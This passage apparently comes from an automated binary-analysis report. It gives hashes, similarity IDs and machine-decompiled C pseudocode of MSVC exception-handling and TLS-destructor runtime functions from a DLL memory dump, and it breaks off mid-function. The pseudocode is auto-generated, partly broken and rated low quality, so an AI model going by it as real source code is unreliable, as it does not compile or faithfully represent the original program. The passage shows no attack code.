                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: e8d5fead8c35136d0c54d17efe06f5ba1214f79b2424ea4de5b8f732776010fd
                          • Instruction ID: 147657f86a18cf3ac8e339e9cd13d4e91b5efbefdcafdd631cb90e1ec3c024ed
                          • Opcode Fuzzy Hash: e8d5fead8c35136d0c54d17efe06f5ba1214f79b2424ea4de5b8f732776010fd
                          • Instruction Fuzzy Hash: 214195F2E00B59A7DB149B64CD48B9A77A6AB46325F000139E416D7BC0DFB4AC1DCF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24D036, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6F24D036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6F24DF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6F24F563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6F24CCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6F24CCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6F24C537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6F24C46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6F24CFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6F24F563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6F24CCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6F24CCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6F24CCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6F24C46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6F24CFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6F24CA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6F24DA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6F24DA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6F24F50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6F24D6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, ?str?) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6F24CA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6F24D6C1( &_v64);
											E6F24C29C( &_v64, 0x6f287f7c);
											L63:
											 *(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6F24C65D(_t279, _t319, _t274);
											E6F24D945(_a8, _a16, _t305);
											_t235 = E6F24DB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6F24D8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6f24d036
                          0x6f24d03d
                          0x6f24d03f
                          0x6f24d048
                          0x6f24d04e
                          0x6f24d056
                          0x6f24d058
                          0x6f24d05b
                          0x6f24d061
                          0x6f24d3da
                          0x6f24d3da
                          0x6f24d3df
                          0x6f24d3e1
                          0x6f24d3e3
                          0x6f24d3e6
                          0x6f24d3e7
                          0x6f24d3ea
                          0x6f24d3f0
                          0x6f24d50f
                          0x6f24d3f6
                          0x6f24d3f6
                          0x6f24d3f7
                          0x6f24d3f8
                          0x6f24d3ff
                          0x6f24d402
                          0x6f24d405
                          0x6f24d40b
                          0x6f24d40d
                          0x6f24d412
                          0x6f24d415
                          0x6f24d417
                          0x6f24d41d
                          0x6f24d41f
                          0x6f24d425
                          0x6f24d43a
                          0x6f24d43f
                          0x6f24d442
                          0x6f24d444
                          0x6f24d50b
                          0x00000000
                          0x6f24d50c
                          0x6f24d444
                          0x6f24d425
                          0x6f24d41d
                          0x6f24d415
                          0x6f24d44a
                          0x6f24d44d
                          0x6f24d450
                          0x6f24d453
                          0x6f24d456
                          0x6f24d45c
                          0x6f24d46e
                          0x6f24d473
                          0x6f24d476
                          0x6f24d479
                          0x6f24d47c
                          0x6f24d47f
                          0x6f24d482
                          0x6f24d485
                          0x00000000
                          0x00000000
                          0x6f24d48b
                          0x6f24d48b
                          0x6f24d48e
                          0x6f24d491
                          0x6f24d4a0
                          0x6f24d4a1
                          0x6f24d4a1
                          0x6f24d4a3
                          0x6f24d4a6
                          0x00000000
                          0x00000000
                          0x6f24d4a8
                          0x6f24d4ab
                          0x00000000
                          0x00000000
                          0x6f24d4b9
                          0x6f24d4bb
                          0x6f24d4be
                          0x6f24d4c0
                          0x6f24d4c8
                          0x6f24d4c8
                          0x6f24d4cb
                          0x6f24d4cd
                          0x6f24d4cf
                          0x6f24d4eb
                          0x6f24d4f0
                          0x6f24d4f3
                          0x6f24d4f3
                          0x00000000
                          0x6f24d4cb
                          0x6f24d4c2
                          0x6f24d4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d4f6
                          0x6f24d4f9
                          0x6f24d4fa
                          0x6f24d4fd
                          0x6f24d500
                          0x6f24d503
                          0x6f24d506
                          0x6f24d506
                          0x00000000
                          0x6f24d491
                          0x6f24d510
                          0x6f24d515
                          0x6f24d516
                          0x6f24d519
                          0x6f24d51c
                          0x6f24d51d
                          0x6f24d51e
                          0x6f24d51f
                          0x6f24d522
                          0x6f24d524
                          0x6f24d59c
                          0x6f24d59e
                          0x6f24d59e
                          0x6f24d526
                          0x6f24d526
                          0x6f24d529
                          0x6f24d52c
                          0x00000000
                          0x6f24d52e
                          0x6f24d52e
                          0x6f24d531
                          0x6f24d534
                          0x6f24d53b
                          0x6f24d53b
                          0x6f24d53e
                          0x6f24d540
                          0x6f24d542
                          0x6f24d574
                          0x6f24d574
                          0x6f24d577
                          0x6f24d57e
                          0x6f24d57e
                          0x6f24d581
                          0x6f24d584
                          0x6f24d58b
                          0x6f24d58b
                          0x6f24d58e
                          0x6f24d595
                          0x6f24d597
                          0x6f24d597
                          0x6f24d590
                          0x6f24d590
                          0x6f24d593
                          0x00000000
                          0x00000000
                          0x6f24d593
                          0x6f24d586
                          0x6f24d586
                          0x6f24d589
                          0x00000000
                          0x00000000
                          0x6f24d589
                          0x6f24d579
                          0x6f24d579
                          0x6f24d57c
                          0x00000000
                          0x00000000
                          0x6f24d57c
                          0x6f24d598
                          0x6f24d544
                          0x6f24d544
                          0x6f24d544
                          0x6f24d547
                          0x6f24d547
                          0x6f24d549
                          0x6f24d54b
                          0x00000000
                          0x00000000
                          0x6f24d54d
                          0x6f24d54f
                          0x6f24d563
                          0x6f24d563
                          0x6f24d551
                          0x6f24d551
                          0x6f24d554
                          0x6f24d557
                          0x00000000
                          0x6f24d559
                          0x6f24d559
                          0x6f24d55c
                          0x6f24d55f
                          0x6f24d561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d561
                          0x6f24d557
                          0x6f24d56c
                          0x6f24d56c
                          0x6f24d56e
                          0x00000000
                          0x6f24d570
                          0x6f24d570
                          0x6f24d570
                          0x00000000
                          0x6f24d56e
                          0x6f24d567
                          0x6f24d569
                          0x6f24d569
                          0x00000000
                          0x6f24d569
                          0x6f24d536
                          0x6f24d536
                          0x6f24d539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d539
                          0x6f24d534
                          0x6f24d52c
                          0x6f24d59f
                          0x6f24d5a3
                          0x6f24d5a3
                          0x6f24d070
                          0x6f24d070
                          0x6f24d079
                          0x6f24d176
                          0x6f24d176
                          0x6f24d179
                          0x00000000
                          0x6f24d0a8
                          0x6f24d0a8
                          0x6f24d0ad
                          0x00000000
                          0x6f24d0b3
                          0x6f24d0b3
                          0x6f24d0bb
                          0x6f24d374
                          0x6f24d378
                          0x6f24d0c1
                          0x6f24d0c6
                          0x6f24d0c9
                          0x6f24d0ce
                          0x6f24d0d5
                          0x6f24d0da
                          0x00000000
                          0x6f24d112
                          0x6f24d11a
                          0x6f24d17e
                          0x6f24d17e
                          0x6f24d181
                          0x6f24d184
                          0x6f24d186
                          0x6f24d189
                          0x6f24d18c
                          0x6f24d192
                          0x6f24d343
                          0x6f24d343
                          0x6f24d346
                          0x00000000
                          0x6f24d348
                          0x6f24d348
                          0x6f24d34b
                          0x00000000
                          0x6f24d351
                          0x6f24d351
                          0x6f24d354
                          0x6f24d357
                          0x6f24d358
                          0x6f24d359
                          0x6f24d35c
                          0x6f24d35d
                          0x6f24d360
                          0x6f24d361
                          0x6f24d366
                          0x00000000
                          0x6f24d366
                          0x6f24d34b
                          0x6f24d198
                          0x6f24d198
                          0x6f24d19c
                          0x00000000
                          0x6f24d1a2
                          0x6f24d1a2
                          0x6f24d1a9
                          0x6f24d1c1
                          0x6f24d1c1
                          0x6f24d1c4
                          0x6f24d1c7
                          0x6f24d1cd
                          0x6f24d1dd
                          0x6f24d1e2
                          0x6f24d1e5
                          0x6f24d1e8
                          0x6f24d1eb
                          0x6f24d1ee
                          0x6f24d1f1
                          0x6f24d1f4
                          0x6f24d1fa
                          0x6f24d1fa
                          0x6f24d1fd
                          0x6f24d200
                          0x6f24d20f
                          0x6f24d210
                          0x6f24d210
                          0x6f24d212
                          0x6f24d215
                          0x6f24d21b
                          0x6f24d21e
                          0x6f24d224
                          0x6f24d226
                          0x6f24d229
                          0x6f24d22c
                          0x6f24d235
                          0x6f24d238
                          0x6f24d23a
                          0x6f24d23a
                          0x6f24d23d
                          0x6f24d240
                          0x6f24d243
                          0x6f24d246
                          0x6f24d249
                          0x6f24d24e
                          0x6f24d24f
                          0x6f24d250
                          0x6f24d251
                          0x6f24d252
                          0x6f24d255
                          0x6f24d257
                          0x6f24d259
                          0x00000000
                          0x6f24d25b
                          0x6f24d25b
                          0x6f24d25b
                          0x6f24d25e
                          0x6f24d261
                          0x6f24d263
                          0x6f24d264
                          0x6f24d269
                          0x6f24d26c
                          0x6f24d26e
                          0x00000000
                          0x00000000
                          0x6f24d270
                          0x6f24d271
                          0x6f24d274
                          0x6f24d276
                          0x00000000
                          0x6f24d278
                          0x6f24d278
                          0x6f24d27b
                          0x6f24d27e
                          0x00000000
                          0x6f24d27e
                          0x00000000
                          0x6f24d276
                          0x6f24d292
                          0x6f24d298
                          0x6f24d2b5
                          0x6f24d2ba
                          0x6f24d2ba
                          0x6f24d2bd
                          0x6f24d2bd
                          0x00000000
                          0x6f24d281
                          0x6f24d281
                          0x6f24d282
                          0x6f24d285
                          0x6f24d288
                          0x6f24d28b
                          0x6f24d28b
                          0x00000000
                          0x6f24d290
                          0x6f24d22c
                          0x6f24d21e
                          0x6f24d2c0
                          0x6f24d2c3
                          0x6f24d2c4
                          0x6f24d2c7
                          0x6f24d2ca
                          0x6f24d2cd
                          0x6f24d2d0
                          0x6f24d2d0
                          0x6f24d2d9
                          0x6f24d2dc
                          0x6f24d2dc
                          0x6f24d1f4
                          0x6f24d2df
                          0x6f24d2e3
                          0x6f24d2e5
                          0x6f24d2e8
                          0x6f24d2ee
                          0x6f24d2ee
                          0x6f24d2f6
                          0x6f24d2fb
                          0x6f24d369
                          0x6f24d369
                          0x6f24d36e
                          0x6f24d372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d2fd
                          0x6f24d2fd
                          0x6f24d301
                          0x6f24d313
                          0x6f24d316
                          0x6f24d319
                          0x6f24d31b
                          0x6f24d332
                          0x6f24d336
                          0x6f24d33c
                          0x6f24d33d
                          0x6f24d33f
                          0x00000000
                          0x6f24d341
                          0x00000000
                          0x6f24d341
                          0x6f24d31d
                          0x6f24d322
                          0x6f24d325
                          0x6f24d32a
                          0x6f24d32d
                          0x00000000
                          0x6f24d32d
                          0x6f24d303
                          0x6f24d306
                          0x6f24d309
                          0x6f24d30b
                          0x00000000
                          0x6f24d30d
                          0x6f24d30d
                          0x6f24d311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d311
                          0x6f24d30b
                          0x6f24d301
                          0x6f24d1ab
                          0x6f24d1ab
                          0x6f24d1b2
                          0x00000000
                          0x6f24d1b4
                          0x6f24d1b4
                          0x6f24d1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d1bb
                          0x6f24d1b2
                          0x6f24d1a9
                          0x6f24d19c
                          0x6f24d11c
                          0x6f24d124
                          0x6f24d127
                          0x6f24d12c
                          0x6f24d130
                          0x6f24d133
                          0x6f24d139
                          0x6f24d13c
                          0x00000000
                          0x6f24d13e
                          0x6f24d13e
                          0x6f24d141
                          0x6f24d143
                          0x6f24d379
                          0x6f24d379
                          0x00000000
                          0x6f24d149
                          0x6f24d151
                          0x6f24d15c
                          0x00000000
                          0x00000000
                          0x6f24d165
                          0x6f24d168
                          0x6f24d169
                          0x6f24d16c
                          0x6f24d16e
                          0x00000000
                          0x6f24d174
                          0x00000000
                          0x6f24d174
                          0x00000000
                          0x6f24d16e
                          0x6f24d149
                          0x6f24d37e
                          0x6f24d37e
                          0x6f24d380
                          0x6f24d381
                          0x6f24d388
                          0x6f24d38b
                          0x6f24d399
                          0x6f24d39e
                          0x6f24d3a3
                          0x6f24d3a6
                          0x6f24d3ab
                          0x6f24d3ae
                          0x6f24d3b1
                          0x6f24d3b3
                          0x6f24d3b5
                          0x6f24d3b5
                          0x6f24d3ba
                          0x6f24d3c6
                          0x6f24d3cc
                          0x6f24d3d1
                          0x6f24d3d4
                          0x6f24d3d5
                          0x00000000
                          0x6f24d3d5
                          0x6f24d13c
                          0x6f24d11a
                          0x6f24d0da
                          0x6f24d0bb
                          0x6f24d0ad
                          0x6f24d079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6F24D133
                          • type_info::operator==.LIBVCRUNTIME ref: 6F24D155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6F24D264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6F24D336
                          • _UnwindNestedFrames.LIBCMT ref: 6F24D3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6F24D3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm$|$(o
                          • API String ID: 2123188842-27053567
                          • Opcode ID: 8532a58839aedee3126caab27cccad806c93d39da5270d57db78c789755fa4d9
                          • Instruction ID: 8562488467857b9f539a0e30709cf6d5de2b8a57134713cd6d8e263ddf9d0c62
                          • Opcode Fuzzy Hash: 8532a58839aedee3126caab27cccad806c93d39da5270d57db78c789755fa4d9
                          • Instruction Fuzzy Hash: F7B1657580030EEFCF19CFA8C98099EBBB6BF44315B90415AE8156B691D3B4EA51CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E6F23C500() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6f28adcc; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6f28adcc; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
